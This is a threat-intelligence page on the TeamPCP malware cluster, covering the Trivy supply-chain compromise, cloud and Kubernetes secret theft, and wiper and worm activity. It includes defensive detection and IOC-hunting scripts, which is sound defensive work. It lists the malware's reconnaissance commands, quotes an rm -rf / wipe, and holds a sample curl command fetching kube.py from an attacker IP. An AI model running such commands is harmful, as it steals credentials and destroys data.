TeamPCP
TeamPCP is a cloud-native malware/threat cluster active in 2025 and 2026, also tracked under the aliases DeadCatx3, PCPcat, ShellForce, and CanisterWorm. It is most prominently associated with the March 2026 supply chain compromise of Aqua Security’s open-source Trivy vulnerability scanner, where malicious Docker Hub images for Trivy versions 0.69.4, 0.69.5, and 0.69.6 distributed TeamPCP infostealer code. The campaign was linked to broader compromise of Aqua Security GitHub assets, including unauthorized repository creation and defacement using the message "TeamPCP Owns Aqua Security," and investigators traced part of the intrusion to a compromised Argon-DevOps-Mgt service account token.
Across the provided reporting, TeamPCP is described as an information stealer focused on cloud-native and developer environments, with additional worm, ransomware, cryptomining, and destructive Kubernetes capabilities. Observed behavior includes host reconnaissance and the harvesting of credentials and secrets from environment variables; .env, .json, .yml, and .yaml files; SSH keys; Docker secrets; Kubernetes secrets and service account tokens; WordPress configuration files; and developer tooling such as GitHub authentication tokens. In one analyzed Python .pth-based stealer wave, it executed reconnaissance commands such as hostname, whoami, uname -a, ip addr, ip route, printenv, kubectl get secrets --all-namespaces, wg showconf all, and gh auth token, and inspected /var/log/auth.log for accepted logins.
A notable TeamPCP capability is live AWS credential abuse. When AWS credentials are available in environment variables or via EC2 IMDS, the malware performs SigV4-authenticated API calls to enumerate and retrieve managed secrets, including secretsmanager:ListSecrets, secretsmanager:GetSecretValue, and ssm:DescribeParameters. This expands theft beyond files on disk to cloud-managed secrets. Collected data has been compressed into archives such as trin.tar.gz and exfiltrated over HTTPS using a custom actor-branded header; other reporting tied TeamPCP artifacts to exfiltration files payload.enc and tpcp.tar.gz.
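The enumerate-then-bulk-read sequence described above (ListSecrets or DescribeParameters followed by a run of GetSecretValue calls from one principal) is visible in CloudTrail. The following detection is an added example written for this page, not code from the original reporting or from any vendor; the account ID, role ARNs, secret IDs and timestamps are constructed, and the window and threshold are tuning choices, not values the page gives.

```python
"""Flag CloudTrail records that look like TeamPCP-style secret harvesting.

Added example for this page, not code from the original reporting. The
account ID, role names, secret IDs and timestamps below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# API calls the page reports TeamPCP issuing once it holds AWS credentials.
ENUMERATION_CALLS = {
    ("secretsmanager.amazonaws.com", "ListSecrets"),
    ("ssm.amazonaws.com", "DescribeParameters"),
}
RETRIEVAL_CALL = ("secretsmanager.amazonaws.com", "GetSecretValue")

COMPROMISED = "arn:aws:sts::111122223333:assumed-role/web-instance-role/i-0abc123def456"
PIPELINE = "arn:aws:sts::111122223333:assumed-role/deploy-role/github-actions"


def _event(time, source, name, arn, secret_id=None):
    """Build a minimal CloudTrail-shaped record (constructed sample data)."""
    return {
        "eventTime": time,
        "eventSource": source,
        "eventName": name,
        "userIdentity": {"arn": arn},
        "requestParameters": {"secretId": secret_id} if secret_id else None,
    }


# Constructed sample: an EC2 instance role enumerates and then pulls several
# secrets within seconds, while a deploy pipeline fetches one secret on its
# usual schedule.
SAMPLE_EVENTS = [
    _event("2026-03-22T10:00:00Z", "secretsmanager.amazonaws.com", "ListSecrets", COMPROMISED),
    _event("2026-03-22T10:00:02Z", "secretsmanager.amazonaws.com", "GetSecretValue", COMPROMISED, "prod/db/password"),
    _event("2026-03-22T10:00:03Z", "secretsmanager.amazonaws.com", "GetSecretValue", COMPROMISED, "prod/github/token"),
    _event("2026-03-22T10:00:05Z", "secretsmanager.amazonaws.com", "GetSecretValue", COMPROMISED, "prod/k8s/kubeconfig"),
    _event("2026-03-22T10:00:08Z", "secretsmanager.amazonaws.com", "GetSecretValue", COMPROMISED, "prod/smtp/password"),
    _event("2026-03-22T10:00:30Z", "ssm.amazonaws.com", "DescribeParameters", COMPROMISED),
    _event("2026-03-22T09:00:00Z", "secretsmanager.amazonaws.com", "GetSecretValue", PIPELINE, "prod/db/password"),
    _event("2026-03-22T11:00:00Z", "secretsmanager.amazonaws.com", "GetSecretValue", PIPELINE, "prod/db/password"),
]


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def find_harvest_bursts(events, window=timedelta(minutes=10), min_retrievals=3):
    """Return one finding per principal that enumerated secrets or parameters
    and then retrieved at least `min_retrievals` secret values within `window`.

    An application that reads the one secret it owns never enumerates, so the
    enumerate-then-bulk-read sequence separates harvesting from normal use.
    """
    by_principal = defaultdict(list)
    for event in events:
        by_principal[event["userIdentity"]["arn"]].append(event)

    findings = []
    for arn, evs in by_principal.items():
        evs.sort(key=_ts)
        for event in evs:
            if (event["eventSource"], event["eventName"]) not in ENUMERATION_CALLS:
                continue
            start = _ts(event)
            pulled = [
                (e["requestParameters"] or {}).get("secretId", "<unknown>")
                for e in evs
                if (e["eventSource"], e["eventName"]) == RETRIEVAL_CALL
                and start <= _ts(e) <= start + window
            ]
            if len(pulled) >= min_retrievals:
                findings.append({
                    "principal": arn,
                    "enumeration_call": event["eventName"],
                    "first_seen": event["eventTime"],
                    "secret_values_pulled": len(pulled),
                    "secret_ids": sorted(set(pulled)),
                })
                break  # one finding per principal is enough for triage
    return findings


if __name__ == "__main__":
    for finding in find_harvest_bursts(SAMPLE_EVENTS):
        print(f"{finding['principal']}: {finding['enumeration_call']} at "
              f"{finding['first_seen']}, then {finding['secret_values_pulled']} "
              f"GetSecretValue calls for {finding['secret_ids']}")
```

The rule keys on the sequence rather than on any single call: GetSecretValue alone is routine for workloads, and ListSecrets alone is what a console user does, but a workload identity (especially an EC2 instance role, whose credentials come from IMDS as the page describes) doing both in quick succession is worth a page. The `secret_ids` list tells the responder which secrets to rotate first.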
TeamPCP is also Kubernetes-aware. Reporting states that its worm uses scripts such as proxy.sh to detect whether it is running inside a Kubernetes cluster and, if so, downloads and executes kube.py to harvest cluster credentials and discover resources via the Kubernetes API. In a modeled intrusion, TeamPCP checked for /var/run/secrets/kubernetes.io/serviceaccount/token, downloaded kube.py from 44.252.85[.]168:666/files/kube.py, and used it to enumerate pods and execute commands across the cluster. Additional observed behaviors include creating persistence via /etc/systemd/system/teampcp-react.service, installing tooling at runtime, deploying tunneling/proxy tools such as frps and gost, executing base64-decoded Python payloads, and reconstructing and launching a miner.
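Both the cluster-wide kubectl get secrets --all-namespaces call mentioned earlier and the pod enumeration plus cross-cluster command execution described in this paragraph leave a trace in the Kubernetes audit log. The analyzer below is an added example for this page, not code from the original reporting; the audit records are constructed in the audit.k8s.io/v1 event shape, and the namespace, pod and service-account names are invented.

```python
"""Detect service-account secret enumeration and exec fan-out in Kubernetes audit logs.

Added example for this page, not code from the original reporting. The
audit records below are constructed samples in the audit.k8s.io/v1 shape; the
namespace, pod and service-account names are invented.
"""
import json
from collections import defaultdict


def _audit(audit_id, user, verb, resource, namespace=None, name=None, subresource=None, uri=""):
    """Build one audit.k8s.io/v1 Event at stage ResponseComplete (constructed)."""
    ref = {"resource": resource}
    if namespace:
        ref["namespace"] = namespace
    if name:
        ref["name"] = name
    if subresource:
        ref["subresource"] = subresource
    return {
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "auditID": audit_id,
        "stage": "ResponseComplete", "verb": verb, "requestURI": uri,
        "user": {"username": user}, "objectRef": ref,
        "responseStatus": {"code": 200},
    }


WEB_SA = "system:serviceaccount:default:web-frontend"
CM_SA = "system:serviceaccount:cert-manager:cert-manager"

# Constructed JSON-lines audit log, as the log backend writes it: a web pod's
# service account lists secrets cluster-wide, lists pods, then opens exec
# sessions on three pods in two namespaces; cert-manager reads its own secret;
# a human admin lists secrets.
SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    _audit("a1", WEB_SA, "list", "secrets", uri="/api/v1/secrets?limit=500"),
    _audit("a2", WEB_SA, "list", "pods", uri="/api/v1/pods?limit=500"),
    _audit("a3", WEB_SA, "create", "pods", "prod", "api-7c9d4", "exec"),
    _audit("a4", WEB_SA, "create", "pods", "prod", "worker-1", "exec"),
    _audit("a5", WEB_SA, "create", "pods", "payments", "gateway-0", "exec"),
    _audit("a6", CM_SA, "get", "secrets", "cert-manager", "tls-ca"),
    _audit("a7", "alice", "list", "secrets", uri="/api/v1/secrets"),
])


def parse_audit_log(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_service_account(event):
    return event.get("user", {}).get("username", "").startswith("system:serviceaccount:")


def analyze(events, exec_fanout_threshold=2):
    """Return findings for service accounts that (a) list or watch secrets with
    no namespace scope, i.e. cluster-wide, or (b) open pods/exec sessions on
    at least `exec_fanout_threshold` distinct pods.

    Human users (such as "alice" above) are left to a separate rule: an admin
    listing secrets with kubectl is routine, a workload identity doing it is not.
    """
    findings = []
    exec_targets = defaultdict(set)
    seen = set()
    for ev in events:
        # Long-running requests emit several stages; count each request once
        # and only after the API server has started handling it.
        if ev.get("stage") == "RequestReceived" or ev.get("auditID") in seen:
            continue
        seen.add(ev.get("auditID"))
        if not is_service_account(ev):
            continue
        user = ev["user"]["username"]
        ref = ev.get("objectRef") or {}
        if ref.get("resource") == "secrets" and ev.get("verb") in ("list", "watch") and not ref.get("namespace"):
            findings.append({"type": "cluster-wide secrets enumeration", "user": user, "requestURI": ev.get("requestURI")})
        if ref.get("resource") == "pods" and ref.get("subresource") == "exec" and ev.get("verb") == "create":
            exec_targets[user].add((ref.get("namespace"), ref.get("name")))
    for user, targets in exec_targets.items():
        if len(targets) >= exec_fanout_threshold:
            findings.append({"type": "pod exec fan-out", "user": user, "targets": sorted(targets)})
    return findings


if __name__ == "__main__":
    for finding in analyze(parse_audit_log(SAMPLE_AUDIT_LOG)):
        print(finding)
```

Both signals depend on the service account having been granted the permissions in the first place; a `web-frontend` account with list rights on secrets cluster-wide and create rights on pods/exec is the RBAC misconfiguration that turns a single compromised pod into the cluster-wide harvesting the page describes, so the findings double as a pointer to the role binding to tighten.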
The content also attributes destructive activity to TeamPCP-linked payloads. Compromised Trivy images reportedly included functionality to wipe Iranian Kubernetes clusters using a container named kamikaze, and to erase non-Kubernetes Iranian hosts with rm -rf / --no-preserve-root. Separate reporting describes TeamPCP as capable of worm propagation into the npm ecosystem using stolen publish tokens, including a self-propagating CanisterWorm that used an Internet Computer Protocol canister as a dead drop resolver for command-and-control.
High-confidence indicators of compromise mentioned in the content include the typosquatted C2 domain scan.aquasecurtiy.org; exfiltration artifacts payload.enc, tpcp.tar.gz, and trin.tar.gz; references to the fallback GitHub repository tpcp-docs; the Trivy Docker Hub tags 0.69.4, 0.69.5, and 0.69.6; the persistence artifact /etc/systemd/system/teampcp-react.service; and infrastructure/URLs such as 67.217.57[.]240:666/files/proxy.sh and 44.252.85[.]168:666/files/kube.py described in TeamPCP intrusion scenarios.
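A practical way to use the indicators above is to run host and cluster inventory through them in one pass: systemd units, pulled container images, DNS queries, process command lines, container names and files on disk. The hunt script below is an added example for this page, not code from the original reporting; the indicator values are the ones listed on the page (IPs are stored defanged and refanged in code), the inventory records are constructed samples, and the Docker Hub repository name aquasec/trivy is an assumption about where the listed tags were published.

```python
"""Match host and cluster inventory against the TeamPCP indicators listed on the page.

Added example for this page, not code from the original reporting. Indicator
values come from the page; the inventory records are constructed samples. The
Docker Hub repository name aquasec/trivy is an assumption.
"""
import re

IOC_DOMAINS = {"scan.aquasecurtiy.org"}
IOC_IPS = {ip.replace("[.]", ".") for ip in ("67.217.57[.]240", "44.252.85[.]168")}
IOC_URL_PATHS = {"/files/proxy.sh", "/files/kube.py"}
IOC_PERSISTENCE = {"/etc/systemd/system/teampcp-react.service"}
IOC_ARCHIVES = {"payload.enc", "tpcp.tar.gz", "trin.tar.gz"}
IOC_IMAGE_TAGS = {"0.69.4", "0.69.5", "0.69.6"}
IOC_CONTAINER_NAMES = {"kamikaze"}
TRIVY_REPO = "aquasec/trivy"  # assumption: Docker Hub repository for the Trivy images

# Constructed inventory: (kind, value) pairs as a collector might emit them.
SAMPLE_INVENTORY = [
    ("systemd_unit", "/etc/systemd/system/teampcp-react.service"),
    ("systemd_unit", "/etc/systemd/system/docker.service"),
    ("image", "docker.io/aquasec/trivy:0.69.5"),
    ("image", "docker.io/library/nginx:1.27"),
    ("dns", "scan.aquasecurtiy.org."),
    ("dns", "api.github.com"),
    ("cmdline", "curl -s http://44.252.85.168:666/files/kube.py -o /tmp/kube.py"),
    ("cmdline", "/usr/bin/python3 /opt/app/server.py"),
    ("container", "kamikaze"),
    ("file", "/tmp/trin.tar.gz"),
]


def _split_image(ref):
    """Split 'registry/repo:tag' into (repo, tag); a colon in a registry
    host:port does not count as a tag separator."""
    repo, sep, tag = ref.rpartition(":")
    if not sep or "/" in tag:
        return ref, "latest"
    return repo, tag


def match_indicator(kind, value):
    """Return a label for the page indicator `value` matches, else None."""
    if kind in ("systemd_unit", "file"):
        if value in IOC_PERSISTENCE:
            return "persistence unit teampcp-react.service"
        base = value.rsplit("/", 1)[-1]
        return f"exfiltration archive {base}" if base in IOC_ARCHIVES else None
    if kind == "image":
        repo, tag = _split_image(value)
        if (repo == TRIVY_REPO or repo.endswith("/" + TRIVY_REPO)) and tag in IOC_IMAGE_TAGS:
            return f"trojanized Trivy image tag {tag}"
        return None
    if kind == "dns":
        return "typosquat C2 domain" if value.lower().rstrip(".") in IOC_DOMAINS else None
    if kind == "container":
        return "wiper container name kamikaze" if value in IOC_CONTAINER_NAMES else None
    if kind == "cmdline":
        for ip in IOC_IPS:
            # Anchor on non-digit, non-dot neighbours so 44.252.85.16 does not match 44.252.85.168.
            if re.search(rf"(?<![\d.]){re.escape(ip)}(?![\d.])", value):
                return f"staging IP {ip}"
        for domain in IOC_DOMAINS:
            if domain in value.lower():
                return f"typosquat C2 domain {domain}"
        for path in IOC_URL_PATHS:
            if path in value:
                return f"staged payload path {path}"
        for archive in IOC_ARCHIVES:
            if archive in value:
                return f"exfiltration archive {archive}"
    return None


def hunt(inventory):
    """Run every inventory record through match_indicator and keep the hits."""
    hits = []
    for kind, value in inventory:
        label = match_indicator(kind, value)
        if label:
            hits.append({"kind": kind, "value": value, "indicator": label})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_INVENTORY):
        print(f"[{hit['kind']}] {hit['value']} -> {hit['indicator']}")
```

The image check is the one most worth wiring into CI: a Trivy image at one of the three listed tags is a compromise indicator on its own, independent of any runtime behaviour, and the page notes those tags had no corresponding GitHub release, so an admission policy that pins Trivy to a digest from a signed release would have refused them outright.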
Groups observed using it
1 distinct threat actor attributed by public researchers.
A new analysis, published on March 22 by Socket researchers, showed both images contained indicators of compromise (IOC) associated with the TeamPCP infostealer previously observed in the campaign.
Techniques & procedures
9 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development: 1 technique
Initial Access: 2 techniques
A supply chain attack against Aqua Security’s open-source Trivy vulnerability scanner has led to the distribution of malicious artifacts via Docker Hub... On March 22, new malicious versions of Trivy, specifically 0.69.4, 0.69.5, and 0.69.6, were pushed to Docker Hub without corresponding GitHub releases or tags.
Stealth: 1 technique
Credential Access: 1 technique
Discovery: 1 technique
Command and Control: 2 techniques
IOCs tracked for this family
55 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
14 sources tracked across advisories, community write-ups, and news.
Previously present malware or infection set in compromised cloud environments whose processes, services, files, containers, and persistence artifacts are removed by PCPJack before PCPJack takes over the host.
Credential-stealing payload/operation that performs host reconnaissance, harvests secrets from files and cloud environments, abuses AWS APIs such as Secrets Manager and SSM to enumerate and retrieve secrets, compresses stolen data into trin.tar.gz, exfiltrates it over HTTPS using a custom header, and cleans up artifacts while leaving a persistence marker.
A credential-harvesting malware/toolset associated with a supply-chain compromise of the Trivy vulnerability scanner, used to steal credentials and enable pivoting to higher-value targets.
A malicious campaign/tooling associated with the compromise of Trivy and subsequent downstream attacks, later spreading into the npm ecosystem via a worm that used stolen publish tokens.